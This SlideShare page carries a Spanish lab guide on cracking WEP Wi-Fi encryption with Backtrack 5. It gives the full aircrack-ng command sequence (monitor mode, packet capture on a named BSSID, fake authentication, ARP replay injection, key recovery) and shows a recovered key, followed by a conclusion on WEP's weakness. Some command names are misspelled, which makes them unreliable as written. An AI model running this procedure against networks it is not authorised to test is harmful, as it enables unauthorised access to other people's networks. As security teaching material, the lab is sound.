SlideShare una empresa de Scribd logo
SEGURIDAD EN WI-FI CON PROTOCOLOS WEP




OBJETIVO:

Desarrollar habilidades y conocimientos con respecto a la forma de vulnerar el
servicio de seguridad WEP en redes inalámbricas tipo Wi-Fi.


MATERIAL A UTILIZAR:


      CD Backtrack 5 descargables de: http://www.backtrack-
      linux.org/downloads/
      Sistema operativo Linux.


TOPOLOGÍA A UTILIZAR:
PROCEDIMIENTOS PARA ACCEDER A UNA RED

Paso # 1: ingresar Backtrack5-ubuntu

Paso # 2: al ingresar al Backtrack5, nos pide login: root y password: toor
cuando arranque la interfaz ponemos la siguiente línea:



#aeromon-ng (este identifica que tarjeta de red se tiene en el equipo) después
#airodump-ng wlan0 (esta escanea las redes que hay alrededor, wlan0 tarjeta
de red de nuestro equipo).




#Iwconfig wlan0 (muestra los datos de la tarjeta).



# sudo ifconfig wlan0 down (este bajo los servicios de la tarjeta de red)

# sudo Iwconfig wlan0 mode monitor (ponerlo en modo monitor)

# sudo ifconfig wlan0 up (este nos sube los servicios del a tarjeta)

# sudo Iwconfig wlan0
Volvemos al paso a escribir airodump-ng wlan0 para escanear las
redes que hay al nuestro alrededor, en este paso escogemos la red
que vamos a craquear (como muestra la figura a continuación.)

Debemos tener en cuenta los números de:

     BSSID
     CANAL
     ESSID - CLIENTE
#airondump-ng –w otro –c 1 –bssid 20:CF:30:37:9F:A8 wlan0

Estas especificaciones son la de la red que vamos a atacar, es
necesario escribir el bssid en mayúscula.

     Otro (nombre de la carpeta donde va capturando los archivos)
     -c (canal de la red).


      BSSID                 CANAL                  ESSID

 20:CF:30:37:9F:A8           CH 1                45159902



NOTA: en este paso esperamos a que mínimo tenga 30.OOO
paquetes, debajo del DATA.
Ahora abrimos otra consola:



#aireplay-ng -1 0 –a 20:CF:30:37:9F:A8 wlan0

(Trabajamos mientras van cargando los archivos)
Abrimos otra consola



# aireplay-ng -3 -b 20:CF:30:37:9F:A8 wlan0


(Este inyecta el tráfico. Este paso no funciona bien en todos los dispositivos
wifi, dependiendo de los drivers y núcleo de nuestro equipo. Esto nos permitirá
acelerar notablemente el proceso de captura de paquetes).
NOTA: las claves salen en hexadecimal y ASCII



En esta misma consola escribimos



#dir otro.cap (este es el archivo de nosotros con extensión .cap)
nos saldrá la siguiente pagina.



#aircrack-ng otro.cap key found         (esta es la clave del
enrutamiento)
CLAVE: BEBDFF5052B42




Esta es la clave: BEBDFF5052B42 es la de la red que atacamos
45159902, a continuación comprobamos que si es la clave correcta.
Backtrack 5
CONCLUSION



Con en el laboratorio hemos concluido que la seguridad en las redes inalámbricas es
imprescindible siempre tener la en cuenta, ya que hay muchas transmisiones que no
son seguras, es casi que obligatorio asegúralas para la confiabilidad de los datos
como la integridad y autenticidad de estos mismos. Apresar que WEP está incluido en
la norma de la IEEE no proporciona seguridad total. Uno de los problemas más
latentes en la utilización de vectores al iniciarlo, ya que no tiene cifrado de mensajes
(clave secreta).

El protocolo WEP no debe ser la única herramienta o política para asegura datos o
contraseñas se debe de implementar otras alternativas y mantener controles para la
confiabilidad e integridad de datos y demás.

Más contenido relacionado

DOC
Qué es wep
PPTX
Servido untangler
PPTX
Forefront tmg
DOCX
Administración de un router
PPT
Principios básicos del router
PPTX
Forefront threat management gateway(TMG 2010)
DOCX
practica 15
PPTX
Forefront TMG
Qué es wep
Servido untangler
Forefront tmg
Administración de un router
Principios básicos del router
Forefront threat management gateway(TMG 2010)
practica 15
Forefront TMG

La actualidad más candente (17)

PPTX
MANEJO DE REDES.PRAC.5
DOCX
practica 15 irdt
PPT
Inseguridad Redes Inalambricas
DOCX
Cisco 1 ejercicio
PPS
WEP and WPA exposed
PDF
Contenidos del VídeoBook de "Pentesting con Kali 2020"
PDF
Practica 15 irdt
ODP
Inserguridad en WIFI
PPTX
DOCX
Microsoft forefront (TMG)
PDF
Firewalls iptables
PPTX
Endian firewall
DOC
Manual Endian
PDF
Curso de GNS3 - Presentación
PPT
Forefront threat management gateway (tmg) 2010
MANEJO DE REDES.PRAC.5
practica 15 irdt
Inseguridad Redes Inalambricas
Cisco 1 ejercicio
WEP and WPA exposed
Contenidos del VídeoBook de "Pentesting con Kali 2020"
Practica 15 irdt
Inserguridad en WIFI
Microsoft forefront (TMG)
Firewalls iptables
Endian firewall
Manual Endian
Curso de GNS3 - Presentación
Forefront threat management gateway (tmg) 2010
Publicidad

Destacado (10)

PDF
Guia backtrack
PPT
Backtrack
PPS
Guía de BackTrack 5
PPTX
Back track
DOCX
Backtrack
PPTX
Sistema operativo Backtrack
PDF
Sistemas operativos portables
PPTX
BackTrack5 - Linux
PDF
Seguridad: Backtrack2
Guia backtrack
Backtrack
Guía de BackTrack 5
Back track
Backtrack
Sistema operativo Backtrack
Sistemas operativos portables
BackTrack5 - Linux
Seguridad: Backtrack2
Publicidad

Similar a Backtrack 5 (20)

PDF
Juan
PDF
Crackeando redes wep
PDF
Workshop Seguridad Wireless
PDF
Testing Redes Inalambricas wifiway (Definiciones))
PDF
Cracking wep con kali linux
ODP
Redeswifi i
PPT
Manual para romper contraseñas WEP y WPA
PDF
Propietario
PPTX
Aircrack ng
PDF
Funcionamiento básico y primeros pasos en wifislax
PDF
Backtrack 3 manual
PDF
Wep wpa wpa2-cracking
PDF
Wep wpa wpa2-cracking
PPT
Hacking wireless by Alberto García
PDF
Seguridad de redes wifi 802
PPTX
Ataque y defensa en redes Wi-Fi
PDF
Hackeo y cracking de wifi
ODP
Taller SITEC 2010
ODT
Aircrack ng: comandos básicos
Juan
Crackeando redes wep
Workshop Seguridad Wireless
Testing Redes Inalambricas wifiway (Definiciones))
Cracking wep con kali linux
Redeswifi i
Manual para romper contraseñas WEP y WPA
Propietario
Aircrack ng
Funcionamiento básico y primeros pasos en wifislax
Backtrack 3 manual
Wep wpa wpa2-cracking
Wep wpa wpa2-cracking
Hacking wireless by Alberto García
Seguridad de redes wifi 802
Ataque y defensa en redes Wi-Fi
Hackeo y cracking de wifi
Taller SITEC 2010
Aircrack ng: comandos básicos

Más de Jeison Candamil (18)

PPTX
PPTX
DOCX
Proteccion de software
PDF
Estadistica (1)
PDF
Introducción a spss
DOCX
Rae hacking
PDF
Auditoria sistema computacional
PDF
DOCX
Backtrack 5
PDF
Rae introducción a backtrack 5
DOCX
Rae linux
DOCX
Rae introducción a backtrack 5
DOCX
Rae linux2
DOCX
PDF
Diseño de red hfc en la ciudad de bogota
DOCX
Diseño de red hfc en la ciudad de bogota
Proteccion de software
Estadistica (1)
Introducción a spss
Rae hacking
Auditoria sistema computacional
Backtrack 5
Rae introducción a backtrack 5
Rae linux
Rae introducción a backtrack 5
Rae linux2
Diseño de red hfc en la ciudad de bogota
Diseño de red hfc en la ciudad de bogota

Backtrack 5

  • 1. SEGURIDAD EN WI-FI CON PROTOCOLOS WEP OBJETIVO: Desarrollar habilidades y conocimientos con respecto a la forma de vulnerar el servicio de seguridad WEP en redes inalámbricas tipo Wi-Fi. MATERIAL A UTILIZAR: CD Backtrack 5 descargables de: http://www.backtrack- linux.org/downloads/ Sistema operativo Linux. TOPOLOGÍA A UTILIZAR:
  • 2. PROCEDIMIENTOS PARA ACCEDER A UNA RED Paso # 1: ingresar Backtrack5-ubuntu Paso # 2: al ingresar al Backtrack5, nos pide login: root y password: toor cuando arranque la interfaz ponemos la siguiente línea: #aeromon-ng (este identifica que tarjeta de red se tiene en el equipo) después
  • 3. #airodump-ng wlan0 (esta escanea las redes que hay alrededor, wlan0 tarjeta de red de nuestro equipo). #Iwconfig wlan0 (muestra los datos de la tarjeta). # sudo ifconfig wlan0 down (este bajo los servicios de la tarjeta de red) # sudo Iwconfig wlan0 mode monitor (ponerlo en modo monitor) # sudo ifconfig wlan0 up (este nos sube los servicios del a tarjeta) # sudo Iwconfig wlan0
  • 4. Volvemos al paso a escribir airodump-ng wlan0 para escanear las redes que hay al nuestro alrededor, en este paso escogemos la red que vamos a craquear (como muestra la figura a continuación.) Debemos tener en cuenta los números de: BSSID CANAL ESSID - CLIENTE
  • 5. #airondump-ng –w otro –c 1 –bssid 20:CF:30:37:9F:A8 wlan0 Estas especificaciones son la de la red que vamos a atacar, es necesario escribir el bssid en mayúscula. Otro (nombre de la carpeta donde va capturando los archivos) -c (canal de la red). BSSID CANAL ESSID 20:CF:30:37:9F:A8 CH 1 45159902 NOTA: en este paso esperamos a que mínimo tenga 30.OOO paquetes, debajo del DATA.
  • 6. Ahora abrimos otra consola: #aireplay-ng -1 0 –a 20:CF:30:37:9F:A8 wlan0 (Trabajamos mientras van cargando los archivos)
  • 7. Abrimos otra consola # aireplay-ng -3 -b 20:CF:30:37:9F:A8 wlan0 (Este inyecta el tráfico. Este paso no funciona bien en todos los dispositivos wifi, dependiendo de los drivers y núcleo de nuestro equipo. Esto nos permitirá acelerar notablemente el proceso de captura de paquetes).
  • 8. NOTA: las claves salen en hexadecimal y ASCII En esta misma consola escribimos #dir otro.cap (este es el archivo de nosotros con extensión .cap) nos saldrá la siguiente pagina. #aircrack-ng otro.cap key found (esta es la clave del enrutamiento)
  • 9. CLAVE: BEBDFF5052B42 Esta es la clave: BEBDFF5052B42 es la de la red que atacamos 45159902, a continuación comprobamos que si es la clave correcta.
  • 11. CONCLUSION Con en el laboratorio hemos concluido que la seguridad en las redes inalámbricas es imprescindible siempre tener la en cuenta, ya que hay muchas transmisiones que no son seguras, es casi que obligatorio asegúralas para la confiabilidad de los datos como la integridad y autenticidad de estos mismos. Apresar que WEP está incluido en la norma de la IEEE no proporciona seguridad total. Uno de los problemas más latentes en la utilización de vectores al iniciarlo, ya que no tiene cifrado de mensajes (clave secreta). El protocolo WEP no debe ser la única herramienta o política para asegura datos o contraseñas se debe de implementar otras alternativas y mantener controles para la confiabilidad e integridad de datos y demás.